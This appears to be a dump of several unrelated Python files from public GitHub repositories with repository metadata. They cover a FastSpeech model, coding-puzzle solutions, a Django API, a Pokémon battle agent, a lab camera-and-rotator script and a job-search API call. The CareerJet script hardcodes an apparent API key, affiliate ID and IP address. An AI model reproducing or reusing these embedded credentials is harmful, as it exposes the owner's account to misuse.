TFFastSpeechDurationPredictor(\n config, dtype=tf.float32, name=\"duration_predictor\"\n )\n self.length_regulator = TFFastSpeechLengthRegulator(\n config,\n enable_tflite_convertible=self.enable_tflite_convertible,\n name=\"length_regulator\",\n )\n self.decoder = TFFastSpeechDecoder(\n config.decoder_self_attention_params,\n is_compatible_encoder=config.encoder_self_attention_params.hidden_size\n == config.decoder_self_attention_params.hidden_size,\n name=\"decoder\",\n )\n self.mel_dense = tf.keras.layers.Dense(\n units=config.num_mels, dtype=tf.float32, name=\"mel_before\"\n )\n self.postnet = TFTacotronPostnet(\n config=config, dtype=tf.float32, name=\"postnet\"\n )\n\n self.setup_inference_fn()\n\n def _build(self):\n \"\"\"Dummy input for building model.\"\"\"\n # fake inputs\n input_ids = tf.convert_to_tensor([[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]], tf.int32)\n speaker_ids = tf.convert_to_tensor([0], tf.int32)\n duration_gts = tf.convert_to_tensor([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]], tf.int32)\n self(input_ids, speaker_ids, duration_gts)\n\n def resize_positional_embeddings(self, new_size):\n self.embeddings.resize_positional_embeddings(new_size)\n self._build()\n\n def call(\n self, input_ids, speaker_ids, duration_gts, training=False, **kwargs,\n ):\n \"\"\"Call logic.\"\"\"\n attention_mask = tf.math.not_equal(input_ids, 0)\n embedding_output = self.embeddings([input_ids, speaker_ids], training=training)\n encoder_output = self.encoder(\n [embedding_output, attention_mask], training=training\n )\n last_encoder_hidden_states = encoder_output[0]\n\n # duration predictor, here use last_encoder_hidden_states, u can use more hidden_states layers\n # rather than just use last_hidden_states of encoder for duration_predictor.\n duration_outputs = self.duration_predictor(\n [last_encoder_hidden_states, attention_mask]\n ) # [batch_size, length]\n\n length_regulator_outputs, encoder_masks = self.length_regulator(\n [last_encoder_hidden_states, duration_gts], training=training\n )\n\n # create decoder positional embedding\n decoder_pos = tf.range(\n 1, tf.shape(length_regulator_outputs)[1] + 1, dtype=tf.int32\n )\n masked_decoder_pos = tf.expand_dims(decoder_pos, 0) * encoder_masks\n\n decoder_output = self.decoder(\n [length_regulator_outputs, speaker_ids, encoder_masks, masked_decoder_pos],\n training=training,\n )\n last_decoder_hidden_states = decoder_output[0]\n\n # here u can use sum or concat more than 1 hidden states layers from decoder.\n mel_before = self.mel_dense(last_decoder_hidden_states)\n mel_after = (\n self.postnet([mel_before, encoder_masks], training=training) + mel_before\n )\n\n outputs = (mel_before, mel_after, duration_outputs)\n return outputs\n\n def _inference(self, input_ids, speaker_ids, speed_ratios, **kwargs):\n \"\"\"Call logic.\"\"\"\n attention_mask = tf.math.not_equal(input_ids, 0)\n embedding_output = self.embeddings([input_ids, speaker_ids], training=False)\n encoder_output = self.encoder(\n [embedding_output, attention_mask], training=False\n )\n last_encoder_hidden_states = encoder_output[0]\n\n # duration predictor, here use last_encoder_hidden_states, u can use more hidden_states layers\n # rather than just use last_hidden_states of encoder for duration_predictor.\n duration_outputs = self.duration_predictor(\n [last_encoder_hidden_states, attention_mask]\n ) # [batch_size, length]\n duration_outputs = tf.math.exp(duration_outputs) - 1.0\n\n if speed_ratios is None:\n speed_ratios = tf.convert_to_tensor(np.array([1.0]), dtype=tf.float32)\n\n speed_ratios = 
tf.expand_dims(speed_ratios, 1)\n\n duration_outputs = tf.cast(\n tf.math.round(duration_outputs * speed_ratios), tf.int32\n )\n\n length_regulator_outputs, encoder_masks = self.length_regulator(\n [last_encoder_hidden_states, duration_outputs], training=False\n )\n\n # create decoder positional embedding\n decoder_pos = tf.range(\n 1, tf.shape(length_regulator_outputs)[1] + 1, dtype=tf.int32\n )\n masked_decoder_pos = tf.expand_dims(decoder_pos, 0) * encoder_masks\n\n decoder_output = self.decoder(\n [length_regulator_outputs, speaker_ids, encoder_masks, masked_decoder_pos],\n training=False,\n )\n last_decoder_hidden_states = decoder_output[0]\n\n # here u can use sum or concat more than 1 hidden states layers from decoder.\n mel_before = self.mel_dense(last_decoder_hidden_states)\n mel_after = (\n self.postnet([mel_before, encoder_masks], training=False) + mel_before\n )\n\n outputs = (mel_before, mel_after, duration_outputs)\n return outputs\n\n def setup_inference_fn(self):\n self.inference = tf.function(\n self._inference,\n experimental_relax_shapes=True,\n input_signature=[\n tf.TensorSpec(shape=[None, None], dtype=tf.int32, name=\"input_ids\"),\n tf.TensorSpec(shape=[None,], dtype=tf.int32, name=\"speaker_ids\"),\n tf.TensorSpec(shape=[None,], dtype=tf.float32, name=\"speed_ratios\"),\n ],\n )\n\n self.inference_tflite = tf.function(\n self._inference,\n experimental_relax_shapes=True,\n input_signature=[\n tf.TensorSpec(shape=[1, None], dtype=tf.int32, name=\"input_ids\"),\n tf.TensorSpec(shape=[1,], dtype=tf.int32, name=\"speaker_ids\"),\n tf.TensorSpec(shape=[1,], dtype=tf.float32, name=\"speed_ratios\"),\n ],\n )\n","repo_name":"TensorSpeech/TensorFlowTTS","sub_path":"tensorflow_tts/models/fastspeech.py","file_name":"fastspeech.py","file_ext":"py","file_size_in_byte":33254,"program_lang":"python","lang":"en","doc_type":"code","stars":3545,"dataset":"github-code","pt":"2"}
+{"seq_id":"73461110766","text":"# Input: nums = [2,7,11,15], target = 9\n# Output: [0,1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n\n my_dict = {}\n for i, num in enumerate(nums):\n print(i , num)\n my_num = target - nums[i]\n if my_num in my_dict: \n return [my_dict[my_num], i]\n else: my_dict[nums[i]] = i\n return []\n \ndef main():\n my_solution = Solution()\n print(my_solution.twoSum([-3,4,3,90], 0))\n\nmain()","repo_name":"shortstring/Practice-Programing","sub_path":"leet code/1.two_sum.py","file_name":"1.two_sum.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"26007506885","text":"#!/gpfs/exfel/sw/software/xfel_anaconda3/1.1/bin/python\nfrom argparse import ArgumentParser\nimport h5py as h5\nimport multiprocessing as mp\nimport numpy as np\nimport re\nimport subprocess\nimport sys\nimport time\n\nfrom . import config\nfrom . import crystfel_info as cri\nfrom .templates import HDFSEE_WRAP\n\n'''\n idx = np.arange(numFrames, dtype=np.int32)\n k, m = divmod(numFrames, poolSize)\n chunks = [idx[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(poolSize)]\n\n\n args = []\n for n in range(poolSize):\n args.append([VDS_filename, chunks[n]])\n\npoolSize = mp.cpu_count() - 1\nprint('Number of available cores:', poolSize)\n'''\n\ndef read_size_from_file(fn):\n with h5.File(fn, 'r') as f:\n n_frames = len(f['/entry_1/data_1/data'])\n print(f'input data size: {n_frames} frames')\n return n_frames\n\n\ndef pix_max_over_frames(fn, n_frames):\n if (n_frames % 1000) == 0:\n n_chunks = int(n_frames / 1000)\n else: \n n_chunks = n_frames // 1000 + 1\n print(f'will find max in {n_chunks} chunks.')\n _px_max = []\n\n with h5.File(fn, 'r') as f:\n _data = f['/entry_1/data_1/data'] # reference only\n for i in range(n_chunks):\n low = 1000 * i\n high = min(1000 * (i+1), n_frames)\n t1 = time.time()\n # data = _data[low:high] # instantiation of array\n data = np.zeros((high-low,) + _data.shape[1:], dtype=_data.dtype)\n k = 0\n for j in range(low, high):\n data[k] = _data[j]\n k += 1\n t2 = time.time()\n print(f'sub-max for range {low:5d} to {high:5d}')\n data[np.isnan(data)] = 0.\n _px_max.append(np.max(data, axis=0))\n t3 = time.time()\n print(f'reading: {(t2 - t1):.3f} s, maximizing: {(t3 - t2):.3f} s')\n px_max = np.max(np.stack(_px_max, axis=0), axis=0)\n print('pixel array:', px_max.shape)\n print('maxing finished.')\n return px_max\n\n\ndef write_hdf5(data, fn):\n data = np.expand_dims(data, axis=0)\n print('output data', data.shape)\n with h5.File(fn, 'w') as f:\n ds = f.create_dataset('entry_1/data_1/data', data=data)\n print('writing finished.')\n\n\ndef display_hdf5(fn, geom, crystfel_version):\n crystfel_import = cri.crystfel_info[crystfel_version]['import']\n\n with open('_hdfsee.sh', 'w') as f:\n f.write(HDFSEE_WRAP % {\n 'IMPORT_CRYSTFEL': crystfel_import,\n 'DATA_FILE': fn,\n 'GEOM': geom\n })\n subprocess.check_output(['sh', '_hdfsee.sh'])\n\n\ndef main(argv=None):\n ap = ArgumentParser(prog='powder.py')\n ap.add_argument('vds_in', help='input VDS file name (multi-frame data)')\n ap.add_argument('h5_out', help='output HDF5 file name (virtual powder image)')\n ap.add_argument('--display', help='optional display')\n args = ap.parse_args(argv)\n\n conf = config.load_from_file()\n n_frames = read_size_from_file(args.vds_in)\n crystfel_version = conf['crystfel']['version']\n max_frames = conf['data']['n_frames_total']\n geom = conf['geom']['file_path']\n if max_frames < n_frames:\n print(f' truncation to {max_frames} frames.')\n n_frames = int(min(n_frames, max_frames))\n max_data = pix_max_over_frames(args.vds_in, n_frames)\n write_hdf5(max_data, args.h5_out)\n if args.display is None:\n \tdisplay_hdf5(args.h5_out, geom, crystfel_version)\n\n","repo_name":"European-XFEL/EXtra-Xwiz","sub_path":"extra_xwiz/powder.py","file_name":"powder.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70888816688","text":"# FIRST SENTENCE\n#Shoutout to Francis my classmate for teaching me the while loop to handle improper user input\nfrom termcolor import colored\nnoun1 = input(\"Enter a noun(City in the Midwest USA): \")\nwhile len(noun1) == 0:\n noun1 = input(\"Enter again: \")\n \n# SECOND SENTENCE \nadjective1 = input(\"Enter an adjective: \")\nwhile len(adjective1) == 0:\n adjective1 = input(\"Enter again: \")\n\nadjective2 = input(\"Enter an adjective: \")\nwhile len(adjective2) == 0:\n adjective2 = input(\"Enter again: \")\n\nconjection1 = input(\"Enter a conjunction: \")\nwhile len(conjection1) == 0:\n conjunction1 = input(\"Enter again: \")\n\nadjective3 = input(\"Enter an adjective: \")\nwhile len(adjective3) == 0:\n adjective3 = input(\"Enter again: \")\n\n# THIRD SENTENCE \nadjective4 = input(\"Enter an adjective: \")\nwhile len(adjective4) == 0:\n adjective4 = input(\"Enter again: \")\n\nadjective5 = input(\"Enter an adjective: \")\nwhile len(adjective5) == 0:\n adjective5 = input(\"Enter again: \")\n\nadverb1 = input(\"Enter an adverb: \")\nwhile len(adverb1) == 0:\n adverb1 = input(\"Enter again: \")\n\nverb1 = input(\"Enter a verb: \")\nwhile len(verb1) == 0:\n verb1 = input(\"Enter again: \")\n\n#FOURTH SENTENCE \npronoun1 = input(\"Enter a pronoun: \")\nwhile len(pronoun1) == 0:\n pronoun1 = input(\"Enter again: \")\n\nadjective6 = input(\"Enter an adjective: \")\nwhile len(adjective6) == 0:\n adjective6 = input(\"Enter again: \")\n\nadjective7 = input(\"Enter an adjective: \")\nwhile len(adjective7) == 0:\n adjective7 = input(\"Enter again: \")\n\nadjective8 = input(\"Enter an adjective: \")\nwhile len(adjective8) == 0:\n adjective8 = input(\"Enter again: \")\n\n# FIFTH SENTENCE \nadjective9 = input(\"Enter an adjective: \")\nwhile len(adjective9) == 0:\n adjective9 = input(\"Enter again: \")\n\n# SIXTH SENTENCE\nnoun2 = input(\"Enter a noun(a thing): \")\nwhile len(noun2) == 0:\n noun2 = input(\"Enter again: \")\n\nadjective10 = input(\"Enter an adjective: \")\nwhile len(adjective10) == 0:\n adjective10 = input(\"Enter again: \")\n\n\n\n\n#OUTPUT FUNCTION\ndef output():\n print(f\"Micheal Jackson was born in {colored(noun1,'red')} USA in 1958.\") \n print(f\"He was a {colored(adjective1, 'red')} performer with a {colored(adjective2, 'red')} voice {colored(conjection1, 'red')} a {colored(adjective3, 'red')} personality.\")\n print(f\"Although he was a {colored(adjective4, 'red')} person, his family and friends thought he was {colored(adjective5, 'red')} for {colored(adverb1, 'red')}, {colored(verb1, 'red')} when he interacted with fans.\")\n print(f\"{colored(pronoun1, 'red')} became famous for creating {colored(adjective6, 'red')} music, {colored(adjective7, 'red')} collaborations, and {colored(adjective8, 'red')} love for his fans. In 1984, Jackson was\")\n print(f\"{colored(adjective9, 'red')} onto the Hollywood Walk of Fame.\")\n print(f\"After his death in 2009, Jackson’s {colored(noun2, 'red')} was released for his fans, becoming the most {colored(adjective10, 'red')} documentary or concert film ever.\")\n\noutput() \n\n\n\n","repo_name":"Jarquevious/MadLibs","sub_path":"mj.py","file_name":"mj.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"13100085172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.http import Http404\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom program_section.serializers import *\n\n\nclass ProgramList(APIView):\n \"\"\"\n List all program, or create a new program\n \"\"\"\n\n def get(self, request, format=None):\n program = Program.objects.all()\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(program, many=True)\n else:\n serializer = ProgramSerializer(program, many=True)\n\n return Response(serializer.data)\n\n def post(self, request, format=None):\n\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(data=request.data)\n else:\n serializer = ProgramSerializer(data=request.data)\n\n # serializer = ProgramWriteSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProgramDetail(APIView):\n \"\"\"\n Retrieve, update or delete a program instance.\n \"\"\"\n\n def get_object(self, pk):\n try:\n return Program.objects.get(pk=pk)\n except Program.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n program = self.get_object(pk)\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(program)\n else:\n serializer = ProgramSerializer(program)\n\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n program = self.get_object(pk)\n\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(program, data=request.data)\n else:\n serializer = ProgramSerializer(program, data=request.data)\n\n # serializer = ProgramSerializer(program, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n program = self.get_object(pk)\n Program.delete(program)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass ProgramsByEmail(APIView):\n\n def get(self, request, format=None):\n observer = Observer.objects.get(email=request.GET.get('email'))\n try:\n queryset = Program.objects.filter(observers__id=observer.id)\n if not len(queryset):\n return Response({\"error\": \"Observer without programs.\"}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = ProgramVerboseSerializer(queryset, many=True)\n return Response(serializer.data)\n except Program.DoesNotExist:\n return Response({\"error\": \"E-mail not found.\"}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass ProgramsByParticipantEmail(APIView):\n\n def get(self, request, format=None):\n participant = Participant.objects.get(email=request.GET.get('email'))\n try:\n queryset = Program.objects.filter(participants__id=participant.id)\n if not len(queryset):\n return Response({\"error\": \"Participant without programs.\"}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = ProgramVerboseSerializer(queryset, many=True)\n return Response(serializer.data)\n except Program.DoesNotExist:\n return Response({\"error\": \"E-mail not found.\"}, 
status=status.HTTP_404_NOT_FOUND)\n","repo_name":"leoscalco/esm-rest-service","sub_path":"program_section/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"13297044205","text":"class Solution:\n def uniquePathsWithObstacles(self, obstacleGrid) -> int:\n if obstacleGrid[-1][-1] == 1:\n return 0\n m = len(obstacleGrid)\n n = len(obstacleGrid[0])\n l = [[0 for _ in range(n)] for _ in range(m)]\n l[0] = [1 for _ in range(n)]\n for i in range(m):\n for j in range(n):\n if i == 0 and j == 0:\n continue\n if i == 0:\n l[i][j] = (l[i][j - 1] if obstacleGrid[i][j - 1] == 0 else 0)\n elif j == 0:\n l[i][j] = (l[i - 1][j] if obstacleGrid[i - 1][j] == 0 else 0)\n else:\n l[i][j] = (l[i][j - 1] if obstacleGrid[i][j - 1] == 0 else 0) + (\n l[i - 1][j] if obstacleGrid[i - 1][j] == 0 else 0)\n\n return l[m - 1][n - 1]\n\n\nif __name__ == '__main__':\n s = Solution()\n r = s.uniquePathsWithObstacles(\n [[0, 1], [0, 0]]\n )\n print(r)\n","repo_name":"KaGen1999/Leetcode-by-Python","sub_path":"63不同路径2.py","file_name":"63不同路径2.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5061412912","text":"from calendar import HTMLCalendar\nfrom datetime import datetime as dtime, date, time\nimport datetime\nfrom .models import Schedule\n\n\nclass ScheduleCalendar(HTMLCalendar):\n def __init__(self, schedules=None):\n super().__init__()\n self.schedules = schedules\n\n def formatday(self, day, weekday, schedules, theyear, themonth, today, selected):\n schedules_from_day = schedules.filter(schedule__day=day)\n schedules_html = \"\"\n\n celebrities = []\n for schedule in schedules_from_day:\n celebrities.extend(schedule.get_celebrity())\n schedules_html += '
'.join(list(set(celebrities)))\n schedules_html += \"
\"\n\n if selected.day == day:\n css = 'selected'\n elif today.day == day:\n css = 'today'\n else:\n css = ''\n\n if day == 0:\n return ' | '\n else:\n return \"\"\"%d%s | \"\"\" % (\n \"%s %s\" % (self.cssclasses[weekday], css), '{0}-{1}-{2}'.format(theyear, themonth, day), day, schedules_html)\n\n def formatweek(self, theweek, schedules, theyear, themonth, today, selected):\n s = ''.join(self.formatday(d, wd, schedules, theyear, themonth, today, selected)\n for (d, wd) in theweek)\n return '%s
' % s\n\n def formatmonth(self, theyear, themonth, today, selected, withyear=True):\n schedules = Schedule.objects.filter(schedule__month=themonth)\n\n v = []\n a = v.append\n a('')\n a('\\n')\n a(self.formatweekheader())\n a('\\n')\n for week in self.monthdays2calendar(theyear, themonth):\n a(self.formatweek(week, schedules, theyear, themonth, today, selected))\n a('\\n')\n a('
')\n a('\\n')\n return ''.join(v)\n","repo_name":"springkjw/celuv-django","sub_path":"apps/schedules/calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"73377319725","text":"# -*- coding: utf-8 -*-\nfrom poke_env.environment.battle import Battle\nfrom poke_env.player.battle_order import BattleOrder, ForfeitBattleOrder\nfrom poke_env.player.env_player import Gen8EnvSinglePlayer\n\nclass Gen8EnvSinglePlayerFixed(Gen8EnvSinglePlayer):\n \"\"\"\n Fixes an issue with inconsistencies in the order of items\n in battle.team vs battle.available_switches\n and battle.active_pokemon.moves vs battle.available_moves\n Ref: https://github.com/hsahovic/poke-env/issues/292\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Gen8EnvSinglePlayerFixed, self).__init__(*args, **kwargs)\n self.done_training = False\n\n def action_to_move(self, action: int, battle: Battle) -> BattleOrder:\n \"\"\"Converts actions to move orders.\n\n The conversion is done as follows:\n\n action = -1:\n The battle will be forfeited.\n 0 <= action < 4:\n The actionth available move in battle.active_pokemon.moves is \n executed.\n 4 <= action < 8:\n The action - 4th available move in battle.active_pokemon.moves is \n executed, with z-move.\n 8 <= action < 12:\n The action - 8th available move in battle.active_pokemon.moves is \n executed, with mega-evolution.\n 12 <= action < 16:\n The action - 12th available move in battle.active_pokemon.moves is \n executed, while dynamaxing.\n 16 <= action < 22\n The action - 16th available switch in battle.team is executed.\n\n If the proposed action is illegal, a random legal move is performed.\n\n :param action: The action to convert.\n :type action: int\n :param battle: The battle in which to act.\n :type battle: Battle\n :return: the order to send to the server.\n :rtype: str\n \"\"\"\n moves = list(battle.active_pokemon.moves.values())\n team = list(battle.team.values())\n force_switch = (len(battle.available_switches) > 0) and battle.force_switch\n # We use the ID of each move here since in some cases\n # The same moves might be in both battle.available_moves\n # and battle.active_pokemon.moves but they may not be the same object\n available_move_ids = [move.id for move in battle.available_moves]\n available_z_moves = [move.id for move in battle.active_pokemon.available_z_moves]\n\n if action == -1:\n return ForfeitBattleOrder()\n # Special case for moves that are never a part of pokemon.moves\n # Example: Struggle, Locked into Outrage via Copycat\n elif (\n action < 4\n and action < len(moves)\n and not force_switch\n and len(available_move_ids) == 1\n ):\n return self.agent.create_order(battle.available_moves[0])\n elif (\n action < 4\n and action < len(moves)\n and not force_switch\n and moves[action].id in available_move_ids\n ):\n return self.agent.create_order(moves[action])\n elif (\n battle.can_z_move\n and battle.active_pokemon\n and 0 <= action - 4 < len(moves)\n and not force_switch\n and moves[action - 4].id in available_z_moves\n ):\n return self.agent.create_order(moves[action - 4], z_move=True)\n elif (\n battle.can_mega_evolve\n and 0 <= action - 8 < len(moves)\n and not force_switch\n and moves[action - 8].id in available_move_ids\n ):\n return self.agent.create_order(moves[action - 8], mega=True)\n elif (\n battle.can_dynamax\n and 0 <= action - 12 < len(moves)\n and not force_switch\n and moves[action - 12].id in available_move_ids\n ):\n return self.agent.create_order(moves[action - 12], dynamax=True)\n elif (\n not battle.trapped\n and 0 <= action - 16 < len(team)\n and team[action - 16] in battle.available_switches\n ):\n return self.agent.create_order(team[action - 16])\n else:\n return 
self.agent.choose_random_move(battle)\n","repo_name":"akashsara/meta-discovery","sub_path":"src/agents/env_player.py","file_name":"env_player.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"41003452483","text":"import requests\r\nimport numpy as np\r\nfrom requests.exceptions import HTTPError\r\n\r\n# Github link for more description on this API: https://github.com/careerjet/careerjet-api-client-python\r\nprojectId = \"nth-honor-259919\"\r\nkey = \"5f414fcedee8f11f5c8116653559c13daa2dbe03\"\r\n\r\naffId = \"8acafed2c2c1c95fdd17ea85633d394a\"\r\nfrom careerjet_api_client import CareerjetAPIClient\r\n\r\ncj = CareerjetAPIClient(\"en_US\");\r\nresult_json = cj.search({\r\n 'location' : 'seattle',\r\n 'keywords' : 'java&python&aws',\r\n 'pagesize' : '5',\r\n 'affid' : \"8acafed2c2c1c95fdd17ea85633d394a\",\r\n 'user_ip' : '209.141.193.102',\r\n 'url' : 'https://www.seekrlabs.com/jobsearch?q=python&l=london',\r\n 'user_agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'\r\n });\r\n\r\nprint(result_json)","repo_name":"SeekrLabs/JobSearchAPI","sub_path":"CareerJetAPI.py","file_name":"CareerJetAPI.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"1961672119","text":"# Double rotate and take image for DRRP method. Make sure the second motor rotates at 5x the rate of the first\r\n# Rotate the first quarter-wave plate between 0 and 180 degrees in 4 or 5 degree steps, depending how much data you want\r\n# Make sure to connect and home both rotators using the Kinesis app BEFORE running this script\r\n# Remember to change the image file name and folder destination as desired\r\n\r\nimport FliSdk_V2 as sdk\r\nfrom astropy.io import fits\r\nimport numpy as np\r\nimport time\r\nfrom pylablib.devices import Thorlabs\r\nimport copy\r\n\r\n# Setting context\r\ncontext = sdk.Init()\r\n\r\nprint(\"Detection of grabbers...\")\r\nlistOfGrabbers = sdk.DetectGrabbers(context)\r\n\r\nif len(listOfGrabbers) == 0:\r\n print(\"No grabber detected, exit.\")\r\n exit()\r\n\r\nprint(\"Done.\")\r\nprint(\"List of detected grabber(s):\")\r\n\r\nfor s in listOfGrabbers:\r\n print(\"- \" + s)\r\n\r\nprint(\"Detection of cameras...\")\r\nlistOfCameras = sdk.DetectCameras(context)\r\n\r\nif len(listOfCameras) == 0:\r\n print(\"No camera detected, exit.\")\r\n exit()\r\n\r\nprint(\"Done.\")\r\n\r\ncameraIndex = 0\r\nprint(\"Setting camera: \" + listOfCameras[cameraIndex])\r\nok = sdk.SetCamera(context, listOfCameras[cameraIndex])\r\n\r\nif not ok:\r\n print(\"Error while setting camera.\")\r\n exit()\r\n\r\nprint(\"Setting mode full.\")\r\n\r\nok = sdk.Update(context)\r\nprint(\"Updating...\")\r\nif not ok:\r\n print(\"Error Updating\")\r\n exit()\r\n\r\nres, mb, fe, pw, init_sensor_temp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context)\r\nif res:\r\n print(\"Initial Temp: {:.2f}C\".format(init_sensor_temp))\r\nelse:\r\n print(\"Error reading temperature.\")\r\n\r\n# Querying sensor temperature\r\ntry:\r\n set_temp = input(\"Temperature to set? (between \" + str(-55) + \" C and \" + str(20)+ \" C) \")\r\n set_temp = float(set_temp)\r\n ok = sdk.FliCredTwo.SetSensorTemp(context, float(set_temp))\r\n if not ok:\r\n print(\"Error while setting temperature.\")\r\n exit()\r\nexcept ValueError:\r\n print(\"Not a valid temperature\")\r\n\r\nok = sdk.Update(context)\r\nprint(\"Starting to cool...\")\r\nif not ok:\r\n print(\"Error while updating.\")\r\n exit()\r\n\r\nres, mb, fe, pw, sensortemp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context);\r\n\r\ntemp_tolerance = 0.3 #get close temp but don't print infinitely\r\n\r\nwhile np.abs(sensortemp - set_temp) >= temp_tolerance:\r\n res, mb, fe, pw, sensortemp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context)\r\n print(\"Sensor Temp: {:.2f}C\".format(sensortemp),'\\n','-------------')\r\n time.sleep(5)\r\n\r\nres, mb, fe, pw, sensortemp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context)\r\nprint(\"Finished Setting Temperature\",'\\n',\"Final Temp: {:.2f}C\".format(sensortemp))\r\n\r\n# Control the fps\r\nfps = 0\r\n\r\nif sdk.IsSerialCamera(context):\r\n res, fps = sdk.FliSerialCamera.GetFps(context)\r\nelif sdk.IsCblueSfnc(context):\r\n res, fps = sdk.FliCblueSfnc.GetAcquisitionFrameRate(context)\r\nprint(\"Current camera FPS: \" + str(fps))\r\n\r\n\r\nval_fps = input(\"FPS to set? 
\")\r\nif val_fps.isnumeric():\r\n if sdk.IsSerialCamera(context):\r\n sdk.FliSerialCamera.SetFps(context, float(val_fps))\r\n elif sdk.IsCblueSfnc(context):\r\n sdk.FliCblueSfnc.SetAcquisitionFrameRate(context, float(val_fps))\r\n\r\n\r\nif sdk.IsCredTwo(context) or sdk.IsCredThree(context):\r\n res, response = sdk.FliSerialCamera.SendCommand(context, \"mintint raw\")\r\n minTint = float(response)\r\n\r\n res, response = sdk.FliSerialCamera.SendCommand(context, \"maxtint raw\")\r\n maxTint = float(response)\r\n\r\n res, response = sdk.FliSerialCamera.SendCommand(context, \"tint raw\")\r\n\r\n print(\"Current camera tint: \" + str(float(response)*1000) + \"ms\")\r\n\r\n set_tint = input(\"Tint to set? (between \" + str(minTint*1000) + \"ms and \" + str(maxTint*1000)+ \"ms) \")\r\n sdk.FliCredTwo.SetTint(context, float(float(set_tint)/1000))\r\n ok = sdk.Update(context)\r\n if not ok:\r\n print(\"error setting tint\")\r\n exit()\r\n\r\n res, response = sdk.FliCredTwo.GetTint(context)\r\n tint = response*1000\r\n print(\"Current camera tint: \" +str(tint) +\"ms\")\r\n\r\n\r\nres = sdk.FliCredTwo.SetConversionGain(context,'low')\r\nif not res:\r\n print('error setting gain mode')\r\nsdk.Update(context)\r\n\r\nval = input(\"Take how many images?\")\r\nval = int(val)\r\n\r\n\r\n# Now that the camera is setup, prepare for rotating while taking picrues\r\n# Most secure way is to ensure connection with the motor through the Kinesis app before running code\r\n\r\nstage1 = Thorlabs.KinesisMotor(Thorlabs.list_kinesis_devices()[0][0],scale='stage')\r\nstage2 = Thorlabs.KinesisMotor(Thorlabs.list_kinesis_devices()[1][0], scale='stage')\r\nprint(\"Connected to K10CR1 devices\")\r\n\r\nprint(\"Homing devices...\")\r\nstage1.move_to(0)\r\nstage1.wait_move()\r\nstage1._setup_homing()\r\nhome1 = stage1.home(sync=True)\r\n\r\nstage2.move_to(0)\r\nstage2.wait_move()\r\nstage2._setup_homing()\r\nhome2 = stage2.home(sync=True)\r\nprint('Homing complete')\r\n\r\nposition1 = stage1.get_position()\r\nposition2 = stage2.get_position()\r\n\r\nprint('Current positions are ' + str(position1) + ' and ' + str(position2) + ' degrees')\r\n\r\n# Query the user what angle range and what increments\r\ntot_angle = input(\"Total angle to rotate (degrees)?\")\r\nincrement = input(\"Increment angle to change?\")\r\n\r\nsteps = int(tot_angle)/int(increment)\r\n\r\nprint(\"Taking images...\")\r\n\r\nfor i in range(int(steps)+1):\r\n sdk.EnableGrabN(context, val+1)\r\n sdk.Update(context)\r\n sdk.Start(context)\r\n time.sleep(val*tint/1000)\r\n counter = 0\r\n max_iter = 10\r\n while sdk.IsGrabNFinished(context) is False:\r\n if counter >= max_iter:\r\n break\r\n time.sleep(1)\r\n counter += 1\r\n print(\"Is grab finished? 
